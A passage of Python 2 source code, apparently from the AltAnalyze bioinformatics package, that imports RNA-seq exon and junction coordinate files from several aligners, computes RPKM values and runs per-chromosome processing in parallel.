if break_now == True:
break
### Check to see if exon.bed and junction.bed file names are propper or faulty (which will result in downstream errors)
double_underscores=[]
no_doubles=[]
for condition in condition_db:
if '__' in condition:
double_underscores.append(condition)
else:
no_doubles.append(condition)
exon_beds=[]
junctions_beds=[]
if len(double_underscores)>0 and len(no_doubles)>0:
### Hence, a problem is likely due to inconsistent naming
print 'The input files appear to have inconsistent naming. If both exon and junction sample data are present, make sure they are named propperly.'
print 'For example: cancer1__exon.bed, cancer1__junction.bed (double underscore required to match these samples up)!'
print 'Exiting AltAnalyze'; forceError
elif len(no_doubles)>0:
for condition in no_doubles:
condition = string.lower(condition)
if 'exon' in condition:
exon_beds.append(condition)
if 'junction' in condition:
junctions_beds.append(condition)
if len(exon_beds)>0 and len(junctions_beds)>0:
print 'The input files appear to have inconsistent naming. If both exon and junction sample data are present, make sure they are named propperly.'
print 'For example: cancer1__exon.bed, cancer1__junction.bed (double underscore required to match these samples up)!'
print 'Exiting AltAnalyze'; forceError
return chr_present
def getStrandMappingData(species):
splicesite_db={}
refExonCoordinateFile = unique.filepath('AltDatabase/ensembl/'+species+'/'+species+'_Ensembl_exon.txt')
firstLine=True
for line in open(refExonCoordinateFile,'rU').xreadlines():
if firstLine: firstLine=False
else:
line = line.rstrip('\n')
t = string.split(line,'\t'); #'gene', 'exon-id', 'chromosome', 'strand', 'exon-region-start(s)', 'exon-region-stop(s)', 'constitutive_call', 'ens_exon_ids', 'splice_events', 'splice_junctions'
geneID, exon, chr, strand, start, stop = t[:6]
splicesite_db[chr,int(start)]=strand
splicesite_db[chr,int(stop)]=strand
return splicesite_db
def importBEDFile(bed_dir,root_dir,species,normalize_feature_exp,getReads=False,searchChr=None,getBiotype=None,testImport=False,filteredJunctions=None):
dir_list = read_directory(bed_dir)
begin_time = time.time()
if 'chr' not in searchChr:
searchChr = 'chr'+searchChr
condition_count_db={}; neg_count=0; pos_count=0; junction_db={}; biotypes={}; algorithms={}; exon_len_db={}; splicesite_db={}
if testImport == 'yes': print "Reading user RNA-seq input data files"
for filename in dir_list:
count_db={}; rows=0
fn=filepath(bed_dir+filename)
condition = export.findFilename(fn)
if '__' in condition:
### Allow multiple junction files per sample to be combined (e.g. canonical and non-canonical junction alignments)
condition=string.split(condition,'__')[0]+filename[-4:]
if ('.bed' in fn or '.BED' in fn or '.tab' in fn or '.TAB' in fn or '.junction_quantification.txt' in fn) and '._' not in condition:
if ('.bed' in fn or '.BED' in fn): delim = 'r'
else: delim = 'rU'
### The below code removes .txt if still in the filename along with .tab or .bed
if '.tab' in fn: condition = string.replace(condition,'.txt','.tab')
elif '.bed' in fn: condition = string.replace(condition,'.txt','.bed')
if '.TAB' in fn: condition = string.replace(condition,'.txt','.TAB')
elif '.BED' in fn: condition = string.replace(condition,'.txt','.BED')
if testImport == 'yes': print "Reading the bed file", [fn], condition
### If the BED was manually created on a Mac, will neeed 'rU' - test this
for line in open(fn,delim).xreadlines(): break
if len(line)>500: delim = 'rU'
for line in open(fn,delim).xreadlines(): ### changed rU to r to remove \r effectively, rather than read as end-lines
data = cleanUpLine(line)
t = string.split(data,'\t')
rows+=1
if rows==1 or '#' == data[0]:
format_description = data
algorithm = 'Unknown'
if 'TopHat' in format_description: algorithm = 'TopHat'
elif 'HMMSplicer' in format_description: algorithm = 'HMMSplicer'
elif 'SpliceMap junctions' in format_description: algorithm = 'SpliceMap'
elif t[0] == 'E1': algorithm = 'BioScope-junction'
elif '# filterOrphanedMates=' in data or 'alignmentFilteringMode=' in data or '#number_of_mapped_reads=' in data:
algorithm = 'BioScope-exon'
elif '.junction_quantification.txt' in fn:
algorithm = 'TCGA format'
if 'barcode' in t: junction_position = 1
else: junction_position = 0
elif '.tab' in fn and len(t)==9:
try: start = float(t[1]) ### expect this to be a numerical coordinate
except Exception: continue
algorithm = 'STAR'
strand = '-' ### If no strand exists
rows=2 ### allows this first row to be processed
if len(splicesite_db)==0: ### get strand to pos info
splicesite_db = getStrandMappingData(species)
if testImport == 'yes': print condition, algorithm
if rows>1:
try:
if ':' in t[0]:
chr = string.split(t[0],':')[0]
else: chr = t[0]
if 'chr' not in chr:
chr = 'chr'+chr
if searchChr == chr or ('BioScope' in algorithm and searchChr == t[1]): proceed = True
elif searchChr == 'chrMT' and ('BioScope' not in algorithm):
if 'M' in chr and len(chr)<6: proceed = True ### If you don't have the length, any random thing with an M will get included
else: proceed = False
else: proceed = False
except IndexError:
print 'The input file:\n',filename
print 'is not formated as expected (format='+algorithm+').'
print 'search chromosome:',searchChr
print t; force_bad_exit
if proceed:
proceed = False
if '.tab' in fn or '.TAB' in fn:
### Applies to non-BED format Junction and Exon inputs (BioScope)
if 'BioScope' in algorithm:
if algorithm == 'BioScope-exon': ### Not BED format
chr,source,data_type,start,end,reads,strand,null,gene_info=t[:9]
if 'chr' not in chr: chr = 'chr'+chr
if data_type == 'exon': ### Can also be CDS
gene_info,test,rpkm_info,null = string.split(gene_info,';')
symbol = string.split(gene_info,' ')[-1]
#refseq = string.split(transcript_info,' ')[-1]
rpkm = string.split(rpkm_info,' ')[-1]
#if normalize_feature_exp == 'RPKM': reads = rpkm ### The RPKM should be adjusted +1 counts, so don't use this
biotype = 'exon'; biotypes[biotype]=[]
exon1_stop,exon2_start = int(start),int(end); junction_id=''
### Adjust exon positions - not ideal but necessary. Needed as a result of exon regions overlapping by 1nt (due to build process)
exon1_stop+=1; exon2_start-=1
#if float(reads)>4 or getReads:
proceed = True ### Added in version 2.0.9 to remove rare novel isoforms
seq_length = abs(exon1_stop-exon2_start)
if algorithm == 'BioScope-junction':
chr = t[1]; strand = t[2]; exon1_stop = int(t[4]); exon2_start = int(t[8]); count_paired = t[17]; count_single = t[19]; score=t[21]
if 'chr' not in chr: chr = 'chr'+chr
try: exon1_start = int(t[3]); exon2_stop = int(t[9])
except Exception: pass ### If missing, these are not assigned
reads = str(int(float(count_paired))+int(float(count_single))) ### Users will either have paired or single read (this uses either)
biotype = 'junction'; biotypes[biotype]=[]; junction_id=''
if float(reads)>4 or getReads: proceed = True ### Added in version 2.0.9 to remove rare novel isoforms
seq_length = abs(float(exon1_stop-exon2_start))
if 'STAR' in algorithm:
chr = t[0]; exon1_stop = int(t[1])-1; exon2_start = int(t[2])+1; strand=''
if 'chr' not in chr: chr = 'chr'+chr
reads = str(int(t[7])+int(t[6]))
biotype = 'junction'; biotypes[biotype]=[]; junction_id=''
if float(reads)>4 or getReads: proceed = True ### Added in version 2.0.9 to remove rare novel isoforms
if (chr,exon1_stop) in splicesite_db:
strand = splicesite_db[chr,exon1_stop]
elif (chr,exon2_start) in splicesite_db:
strand = splicesite_db[chr,exon2_start]
#else: proceed = False
seq_length = abs(float(exon1_stop-exon2_start))
if strand == '-': ### switch the orientation of the positions
exon1_stop,exon2_start=exon2_start,exon1_stop
exon1_start = exon1_stop; exon2_stop = exon2_start
#if 9996685==exon1_stop and 10002682==exon2_stop:
#print chr, strand, reads, exon1_stop, exon2_start,proceed;sys.exit()
else:
try:
if algorithm == 'TCGA format':
coordinates = string.split(t[junction_position],',')
try: chr,pos1,strand = string.split(coordinates[0],':')
except Exception: print t;sys.exit()
chr,pos2,strand = string.split(coordinates[1],':')
if 'chr' not in chr: chr = 'chr'+chr
pos2 = str(int(pos2)-1) ### This is the bed format conversion with exons of 0 length
exon1_start, exon2_stop = pos1, pos2
reads = t[junction_position+1]
junction_id = t[junction_position]
exon1_len=0; exon2_len=0
else:
### Applies to BED format Junction input
chr, exon1_start, exon2_stop, junction_id, reads, strand, null, null, null, null, lengths, null = t
if 'chr' not in chr: chr = 'chr'+chr
exon1_len,exon2_len=string.split(lengths,',')[:2]; exon1_len = int(exon1_len); exon2_len = int(exon2_len)
exon1_start = int(exon1_start); exon2_stop = int(exon2_stop)
biotype = 'junction'; biotypes[biotype]=[]
if strand == '-':
if (exon1_len+exon2_len)==0: ### Kallisto-Splice directly reports these coordinates
exon1_stop = exon1_start
exon2_start = exon2_stop
else:
exon1_stop = exon1_start+exon1_len; exon2_start=exon2_stop-exon2_len+1
### Exons have the opposite order
a = exon1_start,exon1_stop; b = exon2_start,exon2_stop
exon1_stop,exon1_start = b; exon2_stop,exon2_start = a
else:
if (exon1_len+exon2_len)==0: ### Kallisto-Splice directly reports these coordinates
exon1_stop = exon1_start
exon2_start= exon2_stop
else:
exon1_stop = exon1_start+exon1_len; exon2_start=exon2_stop-exon2_len+1
if float(reads)>4 or getReads: proceed = True
if algorithm == 'HMMSplicer':
if '|junc=' in junction_id: reads = string.split(junction_id,'|junc=')[-1]
else: proceed = False
if algorithm == 'SpliceMap':
if ')' in junction_id and len(junction_id)>1: reads = string.split(junction_id,')')[0][1:]
else: proceed = False
seq_length = abs(float(exon1_stop-exon2_start)) ### Junction distance
except Exception,e:
#print traceback.format_exc();sys.exit()
### Applies to BED format exon input (BEDTools export)
# bamToBed -i accepted_hits.bam -split| coverageBed -a stdin -b /home/nsalomonis/databases/Mm_Ensembl_exons.bed > day0_8B__exons.bed
try: chr, start, end, exon_id, null, strand, reads, bp_coverage, bp_total, percent_coverage = t
except Exception:
print 'The file',fn,'does not appear to be propperly formatted as input.'
print t; force_exception
if 'chr' not in chr: chr = 'chr'+chr
algorithm = 'TopHat-exon'; biotype = 'exon'; biotypes[biotype]=[]
exon1_stop,exon2_start = int(start),int(end); junction_id=exon_id; seq_length = float(bp_total)
if seq_length == 0:
seq_length = abs(float(exon1_stop-exon2_start))
### Adjust exon positions - not ideal but necessary. Needed as a result of exon regions overlapping by 1nt (due to build process)
exon1_stop+=1; exon2_start-=1
#if float(reads)>4 or getReads: ### Added in version 2.0.9 to remove rare novel isoforms
proceed = True
#else: proceed = False
if proceed:
if 'chr' not in chr:
chr = 'chr'+chr ### Add the chromosome prefix
if chr == 'chrM': chr = 'chrMT' ### MT is the Ensembl convention whereas M is the Affymetrix and UCSC convention
if chr == 'M': chr = 'MT' ### MT is the Ensembl convention whereas M is the Affymetrix and UCSC convention
if strand == '+': pos_count+=1
else: neg_count+=1
if getReads and seq_length>0:
if getBiotype == biotype:
if biotype == 'junction':
### We filtered for junctions>4 reads before, now we include all reads for expressed junctions
if (chr,exon1_stop,exon2_start) in filteredJunctions:
count_db[chr,exon1_stop,exon2_start] = reads
try: exon_len_db[chr,exon1_stop,exon2_start] = seq_length
except Exception: exon_len_db[chr,exon1_stop,exon2_start] = []
else:
count_db[chr,exon1_stop,exon2_start] = reads
try: exon_len_db[chr,exon1_stop,exon2_start] = seq_length
except Exception: exon_len_db[chr,exon1_stop,exon2_start] = []
elif seq_length>0:
if (chr,exon1_stop,exon2_start) not in junction_db:
ji = JunctionData(chr,strand,exon1_stop,exon2_start,junction_id,biotype)
junction_db[chr,exon1_stop,exon2_start] = ji
try: ji.setSeqLength(seq_length) ### If RPKM imported or calculated
except Exception: null=[]
try: ji.setExon1Start(exon1_start);ji.setExon2Stop(exon2_stop)
except Exception: null=[]
key = chr,exon1_stop,exon2_start
algorithms[algorithm]=[]
if getReads:
if condition in condition_count_db:
### combine the data from the different files for the same sample junction alignments
count_db1 = condition_count_db[condition]
for key in count_db:
if key not in count_db1: count_db1[key] = count_db[key]
else:
combined_counts = int(count_db1[key])+int(count_db[key])
count_db1[key] = str(combined_counts)
condition_count_db[condition]=count_db1
else:
try: condition_count_db[condition] = count_db
except Exception: null=[] ### Occurs for other text files in the directory that are not used for the analysis
end_time = time.time()
if testImport == 'yes': print 'Read coordinates imported in',int(end_time-begin_time),'seconds'
if getReads:
#print len(exon_len_db), getBiotype, 'read counts present for',algorithm
return condition_count_db,exon_len_db,biotypes,algorithms
else:
if testImport == 'yes':
if 'exon' not in biotypes and 'BioScope' not in algorithm:
print len(junction_db),'junctions present in',algorithm,'format BED files.' # ('+str(pos_count),str(neg_count)+' by strand).'
elif 'exon' in biotypes and 'BioScope' not in algorithm:
print len(junction_db),'sequence identifiers present in input files.'
else: print len(junction_db),'sequence identifiers present in BioScope input files.'
return junction_db,biotypes,algorithms
def importExonCoordinates(probeCoordinateFile,search_chr,getBiotype):
probe_coordinate_db={}
junction_db={}
biotypes={}
x=0
fn=filepath(probeCoordinateFile)
for line in open(fn,'rU').xreadlines(): ### changed rU to r to remove \r effectively, rather than read as end-lines
data = cleanUpLine(line)
if x==0: x=1
else:
t = string.split(data,'\t')
probe_id = t[0]; probeset_id=t[1]; chr=t[2]; strand=t[3]; start=t[4]; end=t[5]
exon1_stop,exon2_start = int(start),int(end)
seq_length = abs(float(exon1_stop-exon2_start))
if 'chr' not in chr:
chr = 'chr'+chr ### Add the chromosome prefix
if chr == 'chrM': chr = 'chrMT' ### MT is the Ensembl convention whereas M is the Affymetrix and UCSC convention
if search_chr == chr or search_chr == None:
try: biotype = t[6]
except Exception:
if seq_length>25:biotype = 'junction'
else: biotype = 'exon'
if strand == '-':
exon1_stop,exon2_start = exon2_start, exon1_stop ### this is their actual 5' -> 3' orientation
if biotype == 'junction':
exon1_start,exon2_stop = exon1_stop,exon2_start
else:
exon1_stop+=1; exon2_start-=1
biotypes[biotype]=[]
if getBiotype == biotype or getBiotype == None:
ji = JunctionData(chr,strand,exon1_stop,exon2_start,probe_id,biotype)
junction_db[chr,exon1_stop,exon2_start] = ji
try: ji.setSeqLength(seq_length) ### If RPKM imported or calculated
except Exception: null=[]
try: ji.setExon1Start(exon1_start);ji.setExon2Stop(exon2_stop)
except Exception: null=[]
probe_coordinate_db[probe_id] = chr,exon1_stop,exon2_start ### Import the expression data for the correct chromosomes with these IDs
return probe_coordinate_db, junction_db, biotypes
def importExpressionMatrix(exp_dir,root_dir,species,fl,getReads,search_chr=None,getBiotype=None):
""" Non-RNA-Seq expression data (typically Affymetrix microarray) import and mapping to an external probe-coordinate database """
begin_time = time.time()
condition_count_db={}; neg_count=0; pos_count=0; algorithms={}; exon_len_db={}
probe_coordinate_db, junction_db, biotypes = importExonCoordinates(fl.ExonMapFile(),search_chr,getBiotype)
x=0
fn=filepath(exp_dir)[:-1]
condition = export.findFilename(fn)
### If the BED was manually created on a Mac, will neeed 'rU' - test this
for line in open(fn,'rU').xreadlines(): ### changed rU to r to remove \r effectively, rather than read as end-lines
data = cleanUpLine(line)
t = string.split(data,'\t')
if '#' == data[0]: None
elif x==0:
if 'block' in t:
start_index = 7
else:
start_index = 1
headers = t[start_index:]
x=1
else:
proceed = 'yes' ### restrict by chromosome with minimum line parsing (unless we want counts instead)
probe_id=t[0]
if probe_id in probe_coordinate_db:
key = probe_coordinate_db[probe_id]
if getReads == 'no':
pass
else:
expression_data = t[start_index:]
i=0
for sample in headers:
if sample in condition_count_db:
count_db = condition_count_db[sample]
count_db[key] = expression_data[i]
exon_len_db[key]=[]
else:
count_db={}
count_db[key] = expression_data[i]
condition_count_db[sample] = count_db
exon_len_db[key]=[]
i+=1
algorithms['ProbeData']=[]
end_time = time.time()
if testImport == 'yes': print 'Probe data imported in',int(end_time-begin_time),'seconds'
if getReads == 'yes':
return condition_count_db,exon_len_db,biotypes,algorithms
else:
return junction_db,biotypes,algorithms
def adjustCounts(condition_count_db,exon_len_db):
for key in exon_len_db:
try:
null=exon_len_db[key]
for condition in condition_count_db:
count_db = condition_count_db[condition]
try: read_count = float(count_db[key])+1 ###This adjustment allows us to obtain more realist folds where 0 is compared and use log2
except KeyError: read_count = 1 ###Was zero, but needs to be one for more realistic log2 fold calculations
count_db[key] = str(read_count) ### Replace original counts with adjusted counts
except Exception: null=[]
return condition_count_db
def calculateRPKM(condition_count_db,exon_len_db,biotype_to_examine):
"""Determines the total number of reads in a sample and then calculates RPMK relative to a pre-determined junction length (60).
60 was choosen, based on Illumina single-end read lengths of 35 (5 nt allowed overhand on either side of the junction)"""
### Get the total number of mapped reads
mapped_reads={}
for condition in condition_count_db:
mapped_reads[condition]=0
count_db = condition_count_db[condition]
for key in count_db:
read_count = count_db[key]
mapped_reads[condition]+=float(read_count)
### Use the average_total_reads when no counts reported such that 0 counts are comparable
average_total_reads = 0
for i in mapped_reads:
average_total_reads+=mapped_reads[i]
if testImport == 'yes':
print 'condition:',i,'total reads:',mapped_reads[i]
average_total_reads = average_total_reads/len(condition_count_db)
if testImport == 'yes':
print 'average_total_reads:',average_total_reads
k=0
c=math.pow(10.0,9.0)
for key in exon_len_db:
try:
for condition in condition_count_db:
total_mapped_reads = mapped_reads[condition]
try: read_count = float(condition_count_db[condition][key])+1 ###This adjustment allows us to obtain more realist folds where 0 is compared and use log2
except KeyError: read_count = 1 ###Was zero, but needs to be one for more realistic log2 fold calculations
if biotype_to_examine == 'junction': region_length = 60.0
else:
try: region_length = exon_len_db[key]
except Exception: continue ### This should only occur during testing (when restricting to one or few chromosomes)
if read_count == 1: ###This adjustment allows us to obtain more realist folds where 0 is compared and use log2
rpkm = c*(float(read_count)/(float(average_total_reads)*region_length))
try:
if region_length == 0:
region_length = abs(int(key[2]-key[1]))
rpkm = c*(read_count/(float(total_mapped_reads)*region_length))
except Exception:
print condition, key
print 'Error Encountered... Exon or Junction of zero length encoutered... RPKM failed... Exiting AltAnalyze.'
print 'This error may be due to inconsistent file naming. If both exon and junction sample data is present, make sure they are named propperly.'
print 'For example: cancer1__exon.bed, cancer1__junction.bed (double underscore required to match these samples up)!'
print [read_count,total_mapped_reads,region_length];k=1; forceError
condition_count_db[condition][key] = str(rpkm) ### Replace original counts with RPMK
except Exception:
if k == 1: kill
null=[]
return condition_count_db
def calculateGeneLevelStatistics(steady_state_export,species,expressed_gene_exon_db,normalize_feature_exp,array_names,fl,excludeLowExp=True,exportRPKMs=False):
global UserOptions; UserOptions = fl
exp_file = string.replace(steady_state_export,'-steady-state','')
if normalize_feature_exp == 'RPKM':
exp_dbase, all_exp_features, array_count = importRawCountData(exp_file,expressed_gene_exon_db,excludeLowExp=excludeLowExp)
steady_state_db = obtainGeneCounts(expressed_gene_exon_db,species,exp_dbase,array_count,normalize_feature_exp,excludeLowExp=excludeLowExp); exp_dbase=[]
exportGeneCounts(steady_state_export,array_names,steady_state_db)
steady_state_db = calculateGeneRPKM(steady_state_db)
if exportRPKMs:
exportGeneCounts(steady_state_export,array_names,steady_state_db,dataType='RPKMs')
else:
exp_dbase, all_exp_features, array_count = importNormalizedCountData(exp_file,expressed_gene_exon_db)
steady_state_db = obtainGeneCounts(expressed_gene_exon_db,species,exp_dbase,array_count,normalize_feature_exp); exp_dbase=[]
exportGeneCounts(steady_state_export,array_names,steady_state_db)
return steady_state_db, all_exp_features
def exportGeneCounts(steady_state_export,headers,gene_count_db,dataType='counts'):
### In addition to RPKM gene-level data, export gene level counts and lengths (should be able to calculate gene RPKMs from this file)
if dataType=='counts':
export_path = string.replace(steady_state_export,'exp.','counts.')
else:
export_path = steady_state_export
export_data = export.ExportFile(export_path)
title = string.join(['Ensembl']+headers,'\t')+'\n'
export_data.write(title)
for gene in gene_count_db:
sample_counts=[]
for count_data in gene_count_db[gene]:
try: read_count,region_length = count_data
except Exception: read_count = count_data
sample_counts.append(str(read_count))
sample_counts = string.join([gene]+sample_counts,'\t')+'\n'
export_data.write(sample_counts)
export_data.close()
def importGeneCounts(filename,import_type):
### Import non-normalized original counts and return the max value
counts_filename = string.replace(filename,'exp.','counts.')
status = verifyFile(counts_filename)
if status == 'not found': ### Occurs for non-normalized counts
counts_filename = filename
fn=filepath(counts_filename); x=0; count_db={}
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if x==0: array_names = t[1:]; x=1
else:
gene = t[0]
if import_type == 'max':
count_db[gene] = str(max(map(float,t[1:])))
else:
count_db[gene] = map(float,t[1:])
return count_db,array_names
def calculateGeneRPKM(gene_count_db):
"""Determines the total number of reads in a sample and then calculates RPMK relative to a pre-determined junction length (60).
60 was choosen, based on Illumina single-end read lengths of 35 (5 nt allowed overhand on either side of the junction)"""
### Get the total number of mapped reads (relative to all gene aligned rather than genome aligned exon reads)
mapped_reads={}
for gene in gene_count_db:
index=0
for (read_count,total_len) in gene_count_db[gene]:
try: mapped_reads[index]+=float(read_count)
except Exception: mapped_reads[index]=float(read_count)
index+=1
### Use the average_total_reads when no counts reported such that 0 counts are comparable
average_total_reads = 0
for i in mapped_reads: average_total_reads+=mapped_reads[i]
average_total_reads = average_total_reads/(index+1) ###
c=math.pow(10.0,9.0)
for gene in gene_count_db:
index=0; rpkms = []
for (read_count,region_length) in gene_count_db[gene]:
total_mapped_reads = mapped_reads[index]
#print [read_count],[region_length],[total_mapped_reads]
#if gene == 'ENSMUSG00000028186': print [read_count, index, total_mapped_reads,average_total_reads,region_length]
if read_count == 0: read_count=1; rpkm = c*(float(read_count)/(float(average_total_reads)*region_length)) ###This adjustment allows us to obtain more realist folds where 0 is compared and use log2
else:
try: rpkm = c*(float(read_count+1)/(float(total_mapped_reads)*region_length)) ### read count is incremented +1 (see next line)
except Exception: read_count=1; rpkm = c*(float(read_count)/(float(average_total_reads)*region_length)) ###This adjustment allows us to obtain more realist folds where 0 is compared and use log2
#if gene == 'ENSMUSG00000028186': print rpkm,read_count,index,total_mapped_reads,average_total_reads,region_length
#if gene == 'ENSMUSG00000026049': print gene_count_db[gene], mapped_reads[index], rpkm
rpkms.append(rpkm)
index+=1
gene_count_db[gene] = rpkms ### Replace original counts with RPMK
return gene_count_db
def deleteOldAnnotations(species,root_dir,dataset_name):
db_dir = root_dir+'AltDatabase/'+species
try:
status = export.deleteFolder(db_dir)
if status == 'success':
print "...Previous experiment database deleted"
except Exception: null=[]
count_dir = root_dir+'ExpressionInput/Counts'
try: status = export.deleteFolder(count_dir)
except Exception: pass
if 'exp.' not in dataset_name: dataset_name = 'exp.'+dataset_name
if '.txt' not in dataset_name: dataset_name+='.txt'
export_path = root_dir+'ExpressionInput/'+dataset_name
try: os.remove(filepath(export_path))
except Exception: null=[]
try: os.remove(filepath(string.replace(export_path,'exp.','counts.')))
except Exception: null=[]
try: os.remove(filepath(string.replace(export_path,'exp.','novel.')))
except Exception: null=[]
from copy_reg import pickle
from types import MethodType
def _pickle_method(method):
func_name = method.im_func.__name__
obj = method.im_self
cls = method.im_class
return _unpickle_method, (func_name, obj, cls)
def _unpickle_method(func_name, obj, cls):
for cls in cls.mro():
try:
func = cls.__dict__[func_name]
except KeyError:
pass
else:
break
return func.__get__(obj, cls)
def call_it(instance, name, args=(), kwargs=None):
"indirect caller for instance methods and multiprocessing"
if kwargs is None:
kwargs = {}
return getattr(instance, name)(*args, **kwargs)
def alignExonsAndJunctionsToEnsembl(species,exp_file_location_db,dataset_name,Multi=None):
fl = exp_file_location_db[dataset_name]
try: multiThreading = fl.multiThreading()
except Exception: multiThreading = True
print 'multiThreading:',multiThreading
normalize_feature_exp = fl.FeatureNormalization()
testImport='no'
if 'demo_data' in fl.ExpFile():
### If the input files are in the AltAnalyze test directory, only analyze select chromosomes
print 'Running AltAnalyze in TEST MODE... restricting to select chromosomes only!!!!!'
testImport='yes'
rnaseq_begin_time = time.time()
p = AlignExonsAndJunctionsToEnsembl(species,exp_file_location_db,dataset_name,testImport)
chromosomes = p.getChromosomes()
### The following files need to be produced from chromosome specific sets later
countsFile = p.countsFile()
exonFile = p.exonFile()
junctionFile = p.junctionFile()
junctionCompFile = p.junctionCompFile()
novelJunctionAnnotations = p.novelJunctionAnnotations()
#chromosomes = ['chrMT']
#p('chrY'); p('chr1'); p('chr2')
#chromosomes = ['chr8','chr17']
multiprocessing_pipe = True
if 'exp.' not in dataset_name:
dataset_name = 'exp.'+dataset_name
if '.txt' not in dataset_name:
dataset_name+='.txt'
try:
mlp=Multi
pool_size = mlp.cpu_count()
print 'Using %d processes' % pool_size
if multiprocessing_pipe and multiThreading:
### This is like pool, but less efficient (needed to get print outs)
s = pool_size; b=0
chr_blocks=[]
while s<len(chromosomes):
chr_blocks.append(chromosomes[b:s])
b+=pool_size; s+=pool_size
chr_blocks.append(chromosomes[b:s])
queue = mlp.Queue()
results=[]
#parent_conn, child_conn=multiprocessing.Pipe()
for chromosomes in chr_blocks:
procs=list()
#print 'Block size:',len(chromosomes)
for search_chr in chromosomes:
proc = mlp.Process(target=p, args=(queue,search_chr)) ### passing sys.stdout unfortunately doesn't work to pass the Tk string
procs.append(proc)
proc.start()
for _ in procs:
val = queue.get()
if p.AnalysisMode() == 'GUI': print '*',
results.append(val)
for proc in procs:
proc.join()
elif multiThreading:
pool = mlp.Pool(processes=pool_size)
chr_vars=[]
for search_chr in chromosomes:
chr_vars.append(([],search_chr)) ### As an alternative for the pipe version above, pass an empty list rather than queue
results = pool.map(p, chr_vars) ### worker jobs initiated in tandem
try:pool.close(); pool.join(); pool = None
except Exception: pass
else:
forceThreadingError
print 'Read exon and junction mapping complete'
except Exception,e:
#print e
print 'Proceeding with single-processor version align...'
try: proc.close; proc.join; proc = None
except Exception: pass
try: pool.close(); pool.join(); pool = None
except Exception: pass
results=[] ### For single-thread compatible versions of Python
for search_chr in chromosomes:
result = p([],search_chr)
results.append(result)
results_organized=[]
for result_set in results:
if len(result_set[0])>0: ### Sometimes chromsomes are missing
biotypes = result_set[0]
results_organized.append(list(result_set[1:]))
pooled_results = [sum(value) for value in zip(*results_organized)] # combine these counts
pooled_results = [biotypes]+pooled_results
p.setCountsOverview(pooled_results) # store as retreivable objects
catFiles(countsFile,'Counts')
catFiles(junctionFile,'junctions')
catFiles(exonFile,'exons')
catFiles(junctionCompFile,'comps')
catFiles(novelJunctionAnnotations,'denovo')
if normalize_feature_exp == 'RPKM':
fastRPKMCalculate(countsFile)
rnaseq_end_time = time.time()
print '...RNA-seq import completed in',int(rnaseq_end_time-rnaseq_begin_time),'seconds\n'
biotypes = p.outputResults()
return biotypes
def alignCoordinatesToGeneExternal(species,coordinates_to_annotate):
chr_strand_gene_dbs,location_gene_db,chromosomes,gene_location_db = getChromosomeStrandCoordinates(species,'no')
read_aligned_to_gene=0
for (chr,strand) in coordinates_to_annotate:
if (chr,strand) in chr_strand_gene_dbs:
chr_gene_locations = chr_strand_gene_dbs[chr,strand]
chr_reads = coordinates_to_annotate[chr,strand]
chr_gene_locations.sort(); chr_reads.sort()
### Set GeneID for each coordinate object (primary and seconardary GeneIDs)
read_aligned_to_gene=geneAlign(chr,chr_gene_locations,location_gene_db,chr_reads,'no',read_aligned_to_gene)
### Gene objects will be updated
def catFiles(outFileDir,folder):
""" Concatenate all the chromosomal files but retain only the first header """
root_dir = export.findParentDir(outFileDir)+folder+'/'
dir_list = read_directory(root_dir)
firstFile=True
with open(filepath(outFileDir), 'w') as outfile:
for fname in dir_list:
chr_file = root_dir+fname
header=True
with open(filepath(chr_file)) as infile:
for line in infile:
if header:
header=False
if firstFile:
outfile.write(line)
firstFile=False
else: outfile.write(line)
export.deleteFolder(root_dir)
def error(msg, *args):
return multiprocessing.get_logger().error(msg, *args)
class AlignExonsAndJunctionsToEnsembl:
def setCountsOverview(self, overview):
self.biotypes_store, self.known_count, self.novel_junction_count, self.trans_splicing_reads, self.junctions_without_exon_gene_alignments, self.exons_without_gene_alignment_count = overview
def getChromosomes(self):
chr_list=list()
for c in self.chromosomes:
### Sort chromosome by int number
ci=string.replace(c,'chr','')
try: ci = int(ci)
except Exception: pass
chr_list.append((ci,c))
chr_list.sort()
chr_list2=list()
for (i,c) in chr_list: chr_list2.append(c) ### sorted
return chr_list2
def countsFile(self):
return string.replace(self.expfile,'exp.','counts.')
def junctionFile(self):
junction_file = self.root_dir+'AltDatabase/'+self.species+'/RNASeq/'+self.species + '_Ensembl_junctions.txt'
return junction_file
def exonFile(self):
exon_file = self.root_dir+'AltDatabase/'+self.species+'/RNASeq/'+self.species + '_Ensembl_exons.txt'
return exon_file
def junctionCompFile(self):
junction_comp_file = self.root_dir+'AltDatabase/'+self.species+'/RNASeq/'+self.species + '_junction_comps_updated.txt'
return junction_comp_file
def novelJunctionAnnotations(self):
junction_annotation_file = self.root_dir+'AltDatabase/ensembl/'+self.species+'/'+self.species + '_alternative_junctions_de-novo.txt'
return junction_annotation_file
def AnalysisMode(self): return self.analysisMode
def __init__(self,species,exp_file_location_db,dataset_name,testImport):
self.species = species; self.dataset_name = dataset_name
self.testImport = testImport
fl = exp_file_location_db[dataset_name]
bed_dir=fl.BEDFileDir()
root_dir=fl.RootDir()
#self.stdout = fl.STDOUT()
try: platformType = fl.PlatformType()
except Exception: platformType = 'RNASeq'
try: analysisMode = fl.AnalysisMode()
except Exception: analysisMode = 'GUI'
### This occurs when run using the BAMtoBED pipeline in the GUI
if 'exp.' not in dataset_name:
dataset_name = 'exp.'+dataset_name
if '.txt' not in dataset_name:
dataset_name+='.txt'
self.dataset_name = dataset_name
### Import experimentally identified junction splice-sites
normalize_feature_exp = fl.FeatureNormalization()
if platformType == 'RNASeq':
chr_status = checkBEDFileFormat(bed_dir,root_dir) ### If false, need to remove 'chr' from the search_chr
else:
chr_status = True
#self.fl = fl # Can not pass this object in pool or it breaks
self.platformType = platformType
self.analysisMode = analysisMode
self.root_dir = root_dir
self.normalize_feature_exp = normalize_feature_exp
self.bed_dir = bed_dir
self.chr_status = chr_status
self.exonBedBuildStatus = fl.ExonBedBuildStatus()
self.expfile = root_dir+'ExpressionInput/'+dataset_name
if testImport == 'yes':
print 'Chromosome annotation detected =',chr_status
#if self.exonBedBuildStatus == 'yes':
reformatExonFile(species,'exon',chr_status) ### exports BED format exons for exon expression extraction
"""
Strategies to reduce memory in RNASeq:
1) (done)Delete old AltDatabase-local version if it exists before starting
2) (done)Check to see if a file exists before writing it and if so append rather than create
3) (done)Get counts last and normalize last in for exons and junctions separately.
4) (done)Delete objects explicitly before importing any new data (define a new function that just does this).
5) (done)Get all chromosomes first then parse exon and junction coordinate data on a per known chromosome basis.
6) (done)Prior to deleting all junction/exon object info for each chromsome, save the coordinate(key)-to-annotation information for the read count export file."""
### Delete any existing annotation databases that currently exist (redundant with below)
